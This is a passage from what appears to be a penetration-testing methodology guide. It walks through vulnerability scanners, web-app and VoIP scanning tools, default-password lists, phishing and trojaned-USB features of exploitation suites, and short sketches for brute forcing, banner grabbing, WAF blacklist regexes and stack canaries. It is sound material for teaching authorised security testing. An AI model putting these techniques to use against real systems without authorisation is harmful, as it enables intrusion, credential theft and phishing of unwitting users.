Enumerate Files via NetBIOS

Enumerate Hotfixes via NetBIOS

Enumerate Named Pipes via NetBIOS

Enumerate Machine Information via NetBIOS

Enumerate Audit Policy via NetBIOS

Enumerate Per-User Registry Settings via NetBIOS

Enumerate Groups via NetBIOS

Enumerate Processes via NetBIOS

Enumerate a maximum of 100 users

At this point we are ready to actually perform the Audit Scan. Click the Scan button to start the Audit Scan immediately. To perform the scan at a later point in time or on a regular schedule, click “Schedule.”

Note: Automated tools can sometimes be too aggressive by default and need to be scaled back if the customer is affected.

Retina displays your results in the Results table as it scans the selected IP(s).

Qualys

<Contribution Needed>

Core IMPACT

Core IMPACT is a penetration testing and exploitation toolset used for testing the effectiveness of your information security program. Core IMPACT automates several difficult exploits and has a multitude of exploits and post exploitation capabilities.

Core IMPACT Web

1) Information Gathering. As always, the first step is information gathering. Core organizes web attacks into scenarios. You can create multiple scenarios and test the same application with varying settings, segment a web application, or separate multiple applications. a) Select the target, either by providing a URL or telling Core to choose web servers discovered during the network RPT. b) Choose a method for exploring the site, automatic or interactive.

Screenshot Here

The attack can be directed at a scenario or at individual pages. Each type of exploit has its own configuration wizard. SQL injection tests can be performed on request parameters and/or request cookies. There are three different levels of injection attack: FAST quickly runs the most common tests; NORMAL runs the FAST tests plus some additional tests; FULL runs all tests. (For details on what the different tests check for, select the modules tab, navigate to the Exploits | SQL Injection section and view the contents of the SQL Injection Analyzer, paying attention to the fuzz_strings.) Adding information about known custom error pages and any session arguments will enhance testing. For XSS attacks, configure the browsers XSS should be tested for, whether or not to evaluate POST parameters, and whether to look for persistent XSS vulnerabilities. For PHP remote file injection vulnerabilities, the configuration is either yes, try to exploit, or no, don’t. Monitor the module progress in the Executed Modules pane. If the WebApps Attack and Penetration is successful, then Core Agents (see the note on agents in the Core network RPT section) will appear under vulnerable pages in the Entity View.

Core can leverage XSS exploits to assist with social engineering awareness tests. The wizard will guide the penetration tester through the process of delivering the XSS vulnerability to your list of recipients from the client-side information gathering phase.

Core will check for sensitive information, get database logins, and get the database schema for pages where SQL injection was successfully exploited. Command and SQL shells may also be possible.

The RFI agent (PHP) can be used to gather information, for shell access, or to install the full Core Agent.

Core IMPACT WiFi

Core Impact contains a number of modules for penetration testing an 802.11 wireless network and/or the security of wireless clients. In order to use the wireless modules you must use an AirPcap adapter available from www.cacetech.com.

5) Reporting. Reports about all the discovered WiFi networks, summary information about attacks while using a Fake Access Point, and results of Man In The Middle (MiTM) attacks can be generated.

Core IMPACT Client Side

Core Impact can perform controlled and targeted social engineering attacks against a specified user community via email, web browsers, third-party plug-ins, and other client-side applications.

1) As always, the first step is information gathering. Core Impact has automated modules for scraping email addresses out of search engines (these can utilize search API keys), PGP, DNS and WHOIS records, and LinkedIn, as well as by crawling a website and the contents and metadata of Microsoft Office documents and PDFs, or by importing from a text file generated as documented in the intelligence gathering section of the PTES. 2) With the target list complete, the next step is to create the attack. Core supports multiple types of attacks, including single exploit, multiple exploits, or a phishing-only attack.

Depending on which option is chosen, the wizard will walk you through choosing the exploit, setting the duration of the client-side test, and choosing an email template (note: predefined templates are available, but the message should be customized to match the target environment). Web links can be obfuscated using TinyURL, Bit.ly or Is.gd. After setting the options for the email server, choosing the Core Agent connect-back method (HTTP, HTTPS, or other port), and choosing whether or not to run a module on successful exploitation or to try to collect SMB credentials, the attack will start. Specific modules can be run instead of using the wizard by choosing the modules tab.

Monitor the Executed Modules pane to see the progress of the client side attack. As agents are deployed, they will be added to the network tab. See the network RPT section of the PTES for details on completing the local information gathering, privilege escalation and clean up tasks.

It is also possible to create a trojaned USB drive that will automatically install the Core agent.

Core Web

coreWEBcrawl

With interactive, you set your browser to use Core as a proxy and then navigate through the web application. Further customized discovery modules, like checking for backup and hidden pages, are available on the modules tab. Screenshot Here

3) Web Apps Browser attack. Core can leverage XSS exploits to assist with social engineering awareness tests. The wizard will guide the penetration tester through the process of delivering the XSS vulnerability to your list of recipients from the client-side information gathering phase.

5) Report Generation. Select from a variety of reports like executive, vulnerability and activity reports.

Core WiFi

Core Impact contains a number of modules for penetration testing an 802.11 wireless network and/or the security of wireless clients. In order to use the wireless modules you must use an AirPcap adapter available from www.cacetech.com. <corewireless.jpg> 1) Information Gathering. Select the channels to scan to discover access points or capture wireless packets.

5) Reporting. Reports about all the discovered WiFi networks, summary information about attacks while using a Fake Access Point, and results of Man In The Middle (MiTM) attacks can be generated.

SAINT

SAINT Professional is a commercial suite combining two distinct tools rolled into one easy-to-use management interface: SAINTscanner and SAINTexploit, providing a fully integrated vulnerability assessment and penetration testing toolkit.

SAINTscanner

Once logged in you immediately enter the SAINTscanner page, with the Penetration Testing (SAINTexploit) tab easily available and visible. It is possible to log in to SAINT remotely; by default this is over port 1414, and the hosts allowed to connect have to be set up via Options, startup options, Category remote mode, subcategory host options. Screenshot Here SAINT_Remote_host.png refers (included).

Configuration of scanning options should now be performed, which is accessed via Options, scanning options, Category scanning policy. Each sub-category needs to be addressed to ensure that the correct default scanning parameters are set, i.e. using nmap rather than the in-built SAINT port scanner and which ports to probe, that dangerous checks are disabled (if required), and that the required items for compliance and audit are enabled for reporting, i.e. anti-virus, age of definition check, etc. Screenshot Here SAINT_scanning_options.png refers (included). Note: the target restrictions sub-category should be amended if any hosts are not to be probed.

The most important scanning option is Category scanning policy, sub-category probe options, option “what scanning policy should be used”; the scan required is selected, or a custom policy is built up to suit the actual task. Screenshot here SAINT_policy_setup.png refers (included).

Having configured all the options required, the actual process of carrying out a scan can be addressed:

Step 1 Insert IP range/address or upload target list.

Step 2 Type in credentials. Screenshot here SAINT_scansetup1.png refers (included).

Step 3 Select scan policy type.

Step 4 Determine firewall settings for target.

Step 5 Select Scan Now. Screenshot here SAINT_scansetup2.png refers (included).

SAINTexploit

Different levels of penetration tests can be carried out:

Conducting a test is fairly straightforward once any prior configuration (callback ports, timeouts, etc.) has been carried out. Just select the Pen Test icon, then go through the following 4 steps. Once complete, select run pen test now.

Screenshot here SAINT_pen1.png refers (included).

Screenshot here SAINT_pen2.png refers (included).

Command Prompt. File and Upload Manager. Screenshot Taker. Tunnel.

Custom client-side attacks can be performed by using the exploits icon, selecting exploits, expanding out the client list and clicking on the appropriate exploit that you wish to utilise against the client (run now). Screenshot here SAINT_client1.png refers (included). Select the port the client is to connect to, the shell port and the target type, and annotate any specific mail from and to parameters. Screenshot here SAINT_client2.png refers (included). Type in the subject, and either select a predefined template or alter the message to suit. Screenshot here SAINT_client3.png refers (included). A sample pre-defined template is available which looks very realistic. Screenshot here SAINT_client4.png refers (included). Selecting run now will start the exploit server against the specified target host. Screenshot here SAINT_client5.png refers (included). If a client clicks the link in the email they have just been sent, and they are exploitable, the host will appear in the connections tab and can then be interacted with as above.

Step 1 From the SAINT GUI, go to Data, and from there go to SAINTwriter. Step 2 Read the descriptions of the pre-configured reports and select the one which best suits your needs. Screenshot here SAINT_writer.png refers (included). Sample reports are available here and here: SAINT_report1.pdf and SAINT_report2.pdf refer (included).

Web Application Scanners

General Web Application Scanners

WebInspect (Windows)

HP’s WebInspect application security assessment tool helps identify known and unknown vulnerabilities within the Web application layer. WebInspect can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.

Screenshot Here

In the Scan Name box, enter a name or a brief description of the scan. Next you need to select an assessment mode. The options available are Crawl Only, Crawl and Audit, Audit Only, and Manual. The “Crawl Only” option completely maps a site’s tree structure; after a crawl has been completed, it is possible to click “Audit” to assess an application’s vulnerabilities. “Crawl and Audit” maps the site’s hierarchical data structure and audits each page as it is discovered. This should be used when assessing extremely large sites. “Audit Only” determines vulnerabilities, but does not crawl the web site; the site is not crawled when this option is chosen. Finally, “Manual” mode allows you to navigate manually to sections of the application. It does not crawl the entire site, but records information only about those resources that you encounter while manually navigating the site. Use this option if there are credentialed scans being performed. Also, ensure that you embed the credentials in the profile settings.

It is recommended to crawl the client site first. This allows the opportunity to identify any forms that need to be filtered during the audit as well as identify directories/file names (in some cases, even the profiler) that need to be ignored for a scan to complete.

Manual assessment lets you navigate to whatever sections of your application you choose to visit, using Internet Explorer. List-Driven Assessment performs an assessment using a list of URLs to be scanned; each URL must be fully qualified and must include the protocol (for example, http:// or https://). Workflow-Driven Assessment: WebInspect audits only those URLs included in the macro that you previously recorded and does not follow any hyperlinks encountered during the audit.

Screenshot Here

Once you have selected the appropriate options, click Next to continue.

Screenshot Here

Select Network Authentication if server authentication is required. Then choose the specific authentication method and enter your network credentials. Click Next to continue.

Screenshot Here

If enabled, the slider allows you to select one of four crawl positions: Thorough, Default, Normal, and Quick. Thorough uses the following settings:

Redundant Page Detection: OFF

Maximum Single URL Hits: 20

Maximum Web Form Submissions: 7

Create Script Event Sessions: ON

Maximum Script Events Per Page: 2000

Number of Dynamic Forms Allowed Per Session: Unlimited

Include Parameters In Hit Count: True

Default uses the following settings:

Redundant Page Detection: OFF

Maximum Single URL Hits: 5

Maximum Web Form Submissions: 3

Create Script Event Sessions: ON

Maximum Script Events Per Page: 1000

Number of Dynamic Forms Allowed Per Session: Unlimited

Include Parameters In Hit Count: True

Normal uses the following settings:

Redundant Page Detection: OFF

Maximum Single URL Hits: 5

Maximum Web Form Submissions: 2

Create Script Event Sessions: ON

Maximum Script Events Per Page: 300

Number of Dynamic Forms Allowed Per Session: 1

Include Parameters In Hit Count: False

Quick uses the following settings:

Redundant Page Detection: ON

Maximum Single URL Hits: 3

Maximum Web Form Submissions: 1

Create Script Event Sessions: OFF

Maximum Script Events Per Page: 100

Number of Dynamic Forms Allowed Per Session: 0

Include Parameters In Hit Count: False

Select the appropriate crawl position and click Next to continue.

Ensure that the Run Profiler Automatically box is checked. Click Next to continue.

At this point the scan has been properly configured. There is an option to save the scan settings for later use. Click Scan to exit the wizard and begin the scan.

Screenshot Here

When conducting or viewing a scan, the Information pane contains three collapsible information panels and an information display area. Select the type of information to display by clicking on an item in one of three information panels in the left column.

The Scan Log Tab is used to view information about the assessment. For instance, the time at which certain auditing was conducted against the target. Finally, the Server Information Tab lists items of interest pertaining to the server.

The final step is to export the results for further analysis. To export the results of the analysis to an XML file, click File, then Export. This presents the option to export the Scan or Scan Details.

From the Export Scan Details window we need to choose “Full” from the Details option. This will ensure that we obtain the most comprehensive report possible. Since this is only available in XML format, the only option left to choose is whether to scrub data. If you want to ensure that SSN and credit card data are scrubbed, then select these options. If you choose to scrub IP address information, then the exported data will be useless for our purposes. Click Export to continue, and choose the file location to save the exported data.

The first scan that is performed with WebInspect is the Web Site Assessment Scan. WebInspect makes use of the New Web Site Assessment Wizard to set up the assessment scans.

When you start the New wizard, the Web Service Scan Wizard window appears. The options displayed within the wizard windows are extracted from the WebInspect default settings. The important thing to note is that any changes you make will be used for this scan only.

Screenshot Here

As soon as you start a Web Service Assessment, WebInspect displays in the Navigation pane an icon depicting each session. It also reports possible vulnerabilities on the Vulnerabilities tab and Information tab in the Summary pane. If you click a URL listed in the Summary pane, the program highlights the related session in the Navigation pane and displays its associated information in the Information pane. The relative severity of a vulnerability listed in the Navigation pane is identified by its associated icon.

When conducting or viewing a scan, the Navigation pane is on the left side of the WebInspect window. It includes the Site, Sequence, Search, and Step Mode buttons, which determine the view presented.

The Summary pane has five tabs: Vulnerabilities, Information, Best Practices, Scan Log, and Server Information. The Vulnerabilities Tab lists all vulnerabilities discovered during an audit. The Information Tab lists information discovered during an assessment or crawl. These are not considered vulnerabilities, but simply identify interesting points in the site or certain applications or Web servers. The Best Practices Tab lists issues detected by WebInspect that relate to commonly accepted best practices for Web development. Items listed here are not vulnerabilities, but are indicators of overall site quality and site development security practices (or lack thereof).

Screenshot Here

IBM AppScan

IBM Rational AppScan automates application security testing by scanning applications, identifying vulnerabilities and generating reports with recommendations to ease remediation. This tutorial will apply to the AppScan Standard Edition, which is a desktop solution to automate Web application security testing. It is intended to be used by small security teams with several security testers.

To ensure AppScan has the latest updates you should click Update on the toolbar menu. This will check the IBM servers for updates; Internet access is required.

The simplest way to configure a scan is to use the Configuration Wizard. You can access the Configuration Wizard by clicking “New” on the File menu. You will be presented with the “New Scan” dialog box. Enable or disable the “Configuration Wizard” by checking the box.

You can then choose what type of scan you wish to perform. The default is a Web Application Scan.

You then have to enter the starting URL for the web application. Other options on that screen include choosing case-sensitive path handling for Unix/Linux systems, adding additional servers and domains, and enabling proxy and platform authentication options. Uncheck the case-sensitivity path option if you know all the systems are Windows, as it can help reduce the scan time.

If the web application requires authentication then there are several options to choose from. Recorded allows you to record the login procedure so that AppScan can perform the login automatically. Prompt will present the login screen during the scan whenever a login is required. Automatic can be used in web applications that only require a username and password. An important option is “I want to configure In-Session detection options” if anything other than “None” is chosen. This option automatically detects if the web application is out of session. AppScan will automatically configure this feature, but if it is not correct, scan results will be unreliable.

<AppScan06a Screen Shot Here>

By default AppScan tests the login and logout pages. This is enabled with the “Send tests on login and logout pages” option. Some applications have safeguards that could lock out the test account and prevent a scan from completing. You need to monitor the testing logs to ensure login is not failing. AppScan also deletes previous session tokens before testing login pages. You may need to disable this option if a valid session token is required on the login pages. This can be disabled by unchecking the “Clear session identifiers before testing login pages” option.

You have now completed the scan configuration and will be prompted to start the scan. By default AppScan will start a full scan of the application. To ensure full coverage of the application, a Manual Explore of the application is preferred. With this option AppScan will provide you with a browser window and you can access the application to explore every option and feature available. Once the full application has been explored you can close the browser and AppScan will add the discovered pages to its list for testing. You can then start the full scan (using Scan > Full Scan on the menu bar) and AppScan will automatically scan the application.

Web Directory Listing/Bruteforcing

DirBuster is a Java application that is designed to brute force web directories and file names. DirBuster attempts to find hidden or obfuscated directories, but as with any brute-forcing tool, it is only as good as the directory and file list utilized. For that reason, DirBuster ships with 9 different lists.
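DirBuster is primarily GUI-driven, but it also offers a headless mode. A sketch of such an invocation follows; the jar name, wordlist file and target URL are placeholders for your installation, and exact flags may vary by version (check the tool’s help output):

```shell
# Headless (-H) brute force of the target URL using a wordlist (-l),
# writing findings to a report file (-r).
java -jar DirBuster-1.0-RC1.jar -H -u http://192.0.2.10/ \
     -l directory-list-2.3-medium.txt -r dirbuster-report.txt
```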

Webserver Version/Vulnerability Identification

The ability to identify the Webserver version is critical to identify vulnerabilities specific to a particular installation. This information should have been gathered as part of an earlier phase.

NetSparker (Windows)

NetSparker is a Windows-based web application scanner that tests for all common types of web application security flaws. The scanner allows the user to enter NTLM, forms-based, and certificate-based credentials. NetSparker boasts its ability to confirm the findings it presents to the user, and it is an inexpensive web application scanner.

Specialized Vulnerability Scanners

Virtual Private Networking (VPN)

Virtual Private Networking (VPN) involves “tunneling” private data through the Internet. The four most widely known VPN “standards” are Layer 2 Forwarding (L2F), IP Security (IPsec), Point-to-Point Tunneling Protocol (PPTP), and Layer 2 Tunneling Protocol (L2TP). VPN servers generally will not be detected by TCP port scans, as they do not listen on TCP ports. In addition, they will not normally send ICMP unreachable messages, so UDP port scans are also unlikely to find them. This is why we need specialized scanners to find and identify them.

ike-scan is a command-line IPsec VPN scanning, fingerprinting, and testing tool that uses the IKE protocol to discover, fingerprint, and test IPsec VPN servers. ike-scan sends a properly formatted IKE packet to each of the addresses you wish to scan and displays any IKE responses that are received. While ike-scan has dozens of options, we will only cover the basics here.

Using ike-scan to perform VPN discovery is relatively straightforward. Simply give it an address range (for example, ike-scan 192.168.1.0/24) and it will attempt to identify and fingerprint any IPsec VPN servers that respond.

IPv6

The THC-IPV6 Attack Toolkit is a complete set of tools for scanning for inherent protocol weaknesses in IPv6 deployments. Implementation6 is one such tool; it performs various implementation checks on IPv6.

Exploit6 is another tool from the THC-IPV6 Attack Toolkit which can test for known IPv6 vulnerabilities.

Screenshot Here

War Dialing

War dialing is the process of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code, to search for computers, bulletin board systems, and fax machines.

WarVOX is a suite of tools for exploring, classifying, and auditing telephone systems. Unlike normal wardialing tools, WarVOX works with the actual audio from each call and does not use a modem directly. This model allows WarVOX to find and classify a wide range of interesting lines, including modems, faxes, voice mail boxes, PBXs, loops, dial tones, IVRs, and forwarders. WarVOX provides the unique ability to classify all telephone lines in a given range, not just those connected to modems, allowing for a comprehensive audit of a telephone system.

VoIP

SIPSCAN uses REGISTER, OPTIONS and INVITE request methods to scan for live SIP extensions and users. SIPSCAN comes with a list of usernames (users.txt) to brute force. This should be modified to include data collected during earlier phases to target the specific environment.
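The requests these SIP scanners send are plain text over UDP. A minimal sketch of building such an OPTIONS message in Python follows; every address, extension, and tag value below is an illustrative placeholder, not output from SIPSCAN itself.

```python
# Build a minimal SIP OPTIONS request of the kind SIP scanners send to
# probe for live extensions. Host, extension, and tag values are
# illustrative placeholders.
def build_options(target_ip, extension, src_ip="192.168.1.50", port=5060):
    lines = [
        f"OPTIONS sip:{extension}@{target_ip} SIP/2.0",
        f"Via: SIP/2.0/UDP {src_ip}:{port};branch=z9hG4bK-1",
        f"From: <sip:scanner@{src_ip}>;tag=1234",
        f"To: <sip:{extension}@{target_ip}>",
        "Call-ID: scan-0001",
        "CSeq: 1 OPTIONS",
        "Max-Forwards: 70",
        "Content-Length: 0",
    ]
    return "\r\n".join(lines) + "\r\n\r\n"

msg = build_options("10.0.0.5", "1000")
print(msg.splitlines()[0])  # OPTIONS sip:1000@10.0.0.5 SIP/2.0
```

A scanner simply sends one such request per candidate extension and records which ones draw a response.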

SIPSAK

Screenshot Here

SVMAP is part of the SIPVicious suite and can be used to scan, identify, and fingerprint a single IP or a range of IP addresses. Svmap allows specifying the request method being used, such as OPTIONS, INVITE, and REGISTER.

Passive Testing

Passive testing is exactly what it sounds like: testing for vulnerabilities, but doing so in a passive manner. This is often best left to automated tools, but it can be accomplished by manual methods as well.

Automated Tools

Traffic Monitoring

Traffic Monitoring is a passive mechanism for gathering further information about the targets. This can be helpful in determining the specifics of an operating system or network device. There are times when active fingerprinting may indicate, for example, an older operating system. This may or may not be the case. Passive fingerprinting is essentially a “free” way to ensure that the data you are reporting is as accurate as possible.

P0f is an excellent passive fingerprinting tool. P0f can identify the operating system of machines that connect to you, machines you connect to, and even machines you cannot connect to, based purely on the communications that your interfaces can observe.

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.

Screenshot Here

Tcpdump

Tcpdump is a common packet analyzer that runs under the command line. It allows the user to intercept and display TCP/IP and other packets being transmitted or received over a network to which the computer is attached. Tcpdump works on most Unix-like operating systems: Linux, Solaris, BSD, Mac OS X, HP-UX and AIX among others. In those systems, tcpdump uses the libpcap library to capture packets.

Screenshot Here

Metasploit Scanners

Metasploit Unleashed

The Metasploit Unleashed course has several tutorials on performing vulnerability scanning leveraging the Metasploit Framework.

Vulnerability Validation

Public Research

A product of the vast amount of security research is the discovery of vulnerabilities and associated Proof of Concept (PoC) and/or exploit code. The results from the vulnerability identification phase must be individually validated and where exploits are available, these must be validated. The only exception would be an exploit that results in a Denial of Service (DoS). This would need to be included in the scope to be considered for validation. There are numerous sites that offer such code for download that should be used as part of the Vulnerability Analysis phase.

Exploit-db – http://www.exploit-db.com

Security Focus – http://www.securityfocus.com

Packetstorm – http://www.packetstorm.com

Security Reason – http://www.securityreason.com

Black Asylum – http://www.blackasylum.com/?p=160

Common/default passwords

Attempting to identify whether a device, application, or operating system is vulnerable to a default credential attack is really as simple as trying known default passwords. Default passwords can be obtained from the following websites:

http://www.phenoelit-us.org/dpl/dpl.html

http://cirt.net/passwords

http://www.defaultpassword.com

http://www.passwordsdatabase.com

http://www.isdpodcast.com/resources/62k-common-passwords/
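The check itself is mechanical, as the sketch below shows. The credential pairs and the `try_login` stand-in are illustrative only; in practice `try_login` would be a real authentication attempt (HTTP basic auth, telnet, SNMP, and so on) against the target.

```python
# Sketch of a default-credential check. `try_login` stands in for a real
# authentication attempt against the target service.
DEFAULT_CREDS = [          # tiny sample; real lists hold thousands of pairs
    ("admin", "admin"),
    ("admin", "password"),
    ("root", "toor"),
    ("cisco", "cisco"),
]

def find_default_creds(try_login, creds=DEFAULT_CREDS):
    """Return every default username/password pair the target accepts."""
    return [(u, p) for (u, p) in creds if try_login(u, p)]

# Simulated target that still uses a factory account:
hits = find_default_creds(lambda u, p: (u, p) == ("admin", "password"))
print(hits)  # [('admin', 'password')]
```

Remember to check lockout thresholds (covered below) before running even a short list like this against a live authentication service.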

Establish target list

Identifying all potential targets is critical to penetration testing. Properly established target lists ensure that attacks are properly targeted. If the particular versions of software running in the environment can be identified, the tester is dealing with a known quantity and can even replicate the environment. A properly defined target list should include a mapping of OS versions and patch levels. If known, it should also include web application weaknesses, lockout thresholds, and weak ports for attack.

Mapping Versions

Version checking is a quick way to identify application information. To some extent, versions of services can be fingerprinted using nmap, and versions of web applications can often be gathered by looking at the source of an arbitrary page.

Identifying Patch Levels

To identify the patch level of services internally, consider using software which will interrogate the system for differences between versions. Credentials may be used for this phase of the penetration test, provided the client has acquiesced. Vulnerability scanners are particularly effective at identifying patch levels remotely, without credentials.

Looking for Weak Web Applications

Identifying weak web applications can be a particularly fruitful activity during a penetration test. Things to look for include OTS applications that have been misconfigured, OTS applications that have plugin functionality (plugins often contain more vulnerable code than the base application), and custom applications. Web application fingerprinters such as WAFP can be used here to great effect.

Identify Weak Ports and Services

Identifying weak ports and services can be done using banner grabbing, nmap, and common sense. Many ports and services will lie about, or mislead you regarding, the specifics of their version.
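Banner grabbing needs nothing more than a raw socket, as this sketch shows. It is a minimal illustration, not a replacement for nmap's version detection: it only captures whatever the service volunteers on connect.

```python
# Minimal banner grab: connect and read whatever the service volunteers.
# Many services (FTP, SSH, SMTP) send a version banner immediately.
import socket

def grab_banner(host, port, timeout=3.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            return s.recv(1024).decode(errors="replace").strip()
        except socket.timeout:
            return ""   # service waits for the client to speak first
```

Against a hypothetical FTP server this might return something like "220 ProFTPD Server ready" — but as noted above, banners can be altered, so corroborate them with other fingerprinting data.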

Identify Lockout threshold

Identifying the lockout threshold of an authentication service will allow you to ensure that your bruteforce attacks do not inadvertently lock out valid users during your testing. Identify all disparate authentication services in the environment, and test a single, innocuous account for lockout. Often 5–10 tries of a valid account is enough to determine whether the service will lock users out.

Attack Avenues

Attack avenues focus on identifying all potential attack vectors that could be leveraged against a target. This is much more detailed than simply looking at the open or filtered ports, but evaluates the Footprinting information and automated results in an effort to create an attack tree.

Creation of Attack Trees

Attack trees are conceptual diagrams of threats on target systems and should include all possible attack methods to reach those threats.

Identify protection mechanisms

There is no magic bullet for detecting and subverting Network or Host based protection mechanisms. It takes skill and experience. This is beyond the scope of this document, which only lists the relevant protection mechanisms and describes what they do.

Network protections

“Simple” Packet Filters

Packet filters are rules for classifying packets based on their header fields. Packet classification is essential to routers supporting services such as quality of service (QoS), virtual private networks (VPNs), and firewalls.
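The classification logic described above can be sketched as an ordered rule list matched against packet header fields, first match wins. This is a toy model for illustration only; real filters match many more fields and compile rules into far faster structures.

```python
# Toy packet filter: classify a packet by matching its header fields
# against an ordered rule list; the first matching rule wins.
def matches(rule, pkt):
    # A rule field of None acts as a wildcard for that header field.
    return all(rule.get(k) in (None, pkt[k]) for k in pkt)

def classify(rules, pkt, default="DENY"):
    for rule in rules:
        if matches(rule, pkt):
            return rule["action"]
    return default          # implicit deny, as in most real filters

rules = [
    {"proto": "tcp", "dport": 22, "action": "DENY"},   # block inbound SSH
    {"proto": "tcp", "dport": 80, "action": "ALLOW"},  # allow web traffic
]
print(classify(rules, {"proto": "tcp", "dport": 80}))  # ALLOW
```

Note the implicit default-deny at the end — unmatched traffic falls through to it, which is why rule ordering matters when probing a filter from outside.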

Traffic shaping devices

Traffic shaping is the control of computer network traffic in order to optimize or guarantee performance, improve latency, and/or increase usable bandwidth for some kinds of packets by delaying other kinds of packets that meet certain criteria. During a penetration test, traffic shaping can also control the volume of traffic being sent into a network in a specified period, or the maximum rate at which the traffic is sent. For these reasons, traffic shaping is important to detect at the network edges to avoid packet dropping and packet marking.

Data Loss Prevention (DLP) systems

Data Loss Prevention (DLP) refers to systems that identify, monitor, and protect data in use, data in motion, and data at rest via content inspection and contextual analysis of activities (attributes of originator, data object, medium, timing, recipient/destination and so on). DLP systems are analogous to intrusion-prevention systems for data.

Host based protections

Host-based protections usually revolve around an installed software package which monitors a single host for suspicious activity by analyzing events occurring within that host. The majority of Host-based protections utilize one of three detection methods: signature-based, statistical anomaly-based and stateful protocol analysis.

Stack/heap protections

Numerous tools are available that can monitor the host to provide protections against buffer overflows. Microsoft’s Data Execution Prevention (DEP) is one example; it marks pages of memory as non-executable, so that injected code placed on the stack or heap cannot be executed directly.

Whitelisting

Whitelisting provides a list of entities that are granted a particular privilege, service, mobility, access, or recognition. An emerging approach to combating viruses and malware is to whitelist software which is considered safe to run, blocking all others.
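One common implementation of application whitelisting is hash-based: only binaries whose cryptographic digest appears on the allow list may execute. The sketch below illustrates the idea; the "binary" contents are placeholders, not real executables.

```python
# Sketch of hash-based application whitelisting: only binaries whose
# SHA-256 digest appears in the allow list may execute.
import hashlib

ALLOWED = {
    # digest of a known-good binary's contents (illustrative entry)
    hashlib.sha256(b"known good binary").hexdigest(),
}

def may_execute(binary_bytes):
    return hashlib.sha256(binary_bytes).hexdigest() in ALLOWED

print(may_execute(b"known good binary"))  # True
print(may_execute(b"malware payload"))    # False
```

From an attacker's perspective, this design is why whitelist bypass techniques (covered later) focus on abusing already-whitelisted binaries rather than introducing new ones.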

AV/Filtering/Behavioral Analysis

Behavioral analysis works from a set of rules that define a program as either legitimate, or malicious. Behavioral analysis technology monitors what an application or piece of code does and attempts to restrict its action. Examples of this might include applications trying to write to certain parts of a system registry, or writing to pre-defined folders. These and other actions would be blocked, with the actions notified to the user or administrator.

Application level protections

Exploitation

Precision strike

Additional information on exploitation can be found at the Metasploit Unleashed course.

Countermeasure Bypass

<Contribution Needed>

AV

<Contribution Needed>

Encoding

Packing

Whitelist Bypass

Process Injection

Purely Memory Resident

Human

<Contribution Needed>

HIPS

<Contribution Needed>

DEP

<Contribution Needed>

ASLR

<Contribution Needed>

VA + NX (Linux)

<Contribution Needed>

w^x (OpenBSD)

<Contribution Needed>

WAF

A WAF (web application firewall) is a firewall which can be installed in front of (topologically speaking) a web application. The WAF analyzes each request and looks for common web attacks such as cross-site scripting and SQL injection. Like most AV scanners, a blacklisting mechanism (often regex-based) is used to find these potentially malicious HTTP requests. Because these WAFs rely on blacklisting, multiple papers exist on bypassing these types of devices.
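The regex blacklisting described above can be illustrated in a few lines. These three patterns are toy examples; production WAF rule sets are vastly larger, and the bypass papers mentioned exploit exactly the gaps such pattern lists leave.

```python
# Toy WAF-style blacklist: flag requests matching common attack patterns.
import re

BLACKLIST = [
    re.compile(r"<\s*script", re.I),            # reflected XSS attempts
    re.compile(r"\bunion\s+select\b", re.I),    # classic SQL injection
    re.compile(r"\.\./"),                       # path traversal
]

def is_malicious(request: str) -> bool:
    return any(p.search(request) for p in BLACKLIST)

print(is_malicious("GET /?q=<script>alert(1)</script>"))  # True
print(is_malicious("GET /?q=1 UNION SELECT user,pass"))   # True
print(is_malicious("GET /index.html"))                    # False
```

Anything the patterns do not anticipate — alternate encodings, comment tricks, case variations the regex misses — sails through, which is the fundamental weakness of the blacklist approach.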

Stack Canaries

In order to understand the use of stack canaries, one needs to understand the fundamental flaw of buffer overflows. A buffer overflow happens when an application fails to verify that the length of the input received fits within the buffer in memory to which the data is copied. Due to the way the stack is built and the way data is placed on the stack, the input received can be used to overwrite the saved EIP (extended instruction pointer — the return address the application uses to know where execution should resume after the function returns). When an attacker controls the EIP, the execution of the application can be altered in such a way that the attacker has full control of the application. A potential fix is to add a “cookie”, or stack canary, right after the buffer on the stack. When the function is about to return, the value of the stack canary is verified. If this value has been altered, the program will ignore the EIP and crash, thereby making the buffer overflow ineffective.
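The mechanism can be simulated in a few lines of Python. This is a conceptual model only — a compiler emits the equivalent check in machine code — but it shows why any overflow that reaches the return address must trample the canary first.

```python
# Conceptual simulation of a stack canary: the canary sits between the
# buffer and the saved return address, so an overflow long enough to
# reach the return address must overwrite the canary first.
import os

def call_with_canary(user_input: bytes, buf_size: int = 8):
    canary = os.urandom(4)                      # fresh random canary
    frame = bytearray(buf_size) + canary        # [buffer][canary]
    frame[:len(user_input)] = user_input        # unchecked copy (the bug)
    if bytes(frame[buf_size:buf_size + 4]) != canary:
        raise RuntimeError("stack smashing detected")  # abort, never return
    return "returned normally"

print(call_with_canary(b"short"))               # returned normally
```

An input longer than the buffer raises the "stack smashing detected" error instead of returning, which models the crash described above.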

Microsoft Windows

The cookie in Windows is added by Visual Studio. One of the options when compiling an application is /GS, which is enabled by default. The cookie is calculated using a few process-specific variables. Below is representative code showing how this cookie is calculated.
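The original listing is not reproduced here, but the calculation amounts to XORing several process-specific values together. The sketch below is an approximation with illustrative inputs, not the actual Windows implementation; on a real system the inputs come from GetSystemTimeAsFileTime, GetCurrentProcessId, GetCurrentThreadId, GetTickCount, and QueryPerformanceCounter.

```python
# Approximation of the /GS cookie computation: several process-specific
# values XORed together. All argument values are illustrative only.
def gs_cookie(ft_high, ft_low, pid, tid, tick_count, perf_counter):
    cookie = ft_high ^ ft_low ^ pid ^ tid ^ tick_count ^ perf_counter
    return cookie & 0xFFFFFFFF          # 32-bit cookie on x86

print(hex(gs_cookie(0x01C9F2AA, 0x3B8D12E0, 0x0FA0, 0x0E4C,
                    0x004C4B40, 0x0012D687)))
```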

As you can see, most of these values are not hard to figure out, except perhaps the LowDateTime and the performance counter. An excellent paper, “Exploiting the otherwise non-exploitable”, has been written concerning this lack of entropy.

Linux

As in Windows, the de facto default compiler, gcc, adds the code for the stack canary. This code can be found in the file libssp/ssp.c.

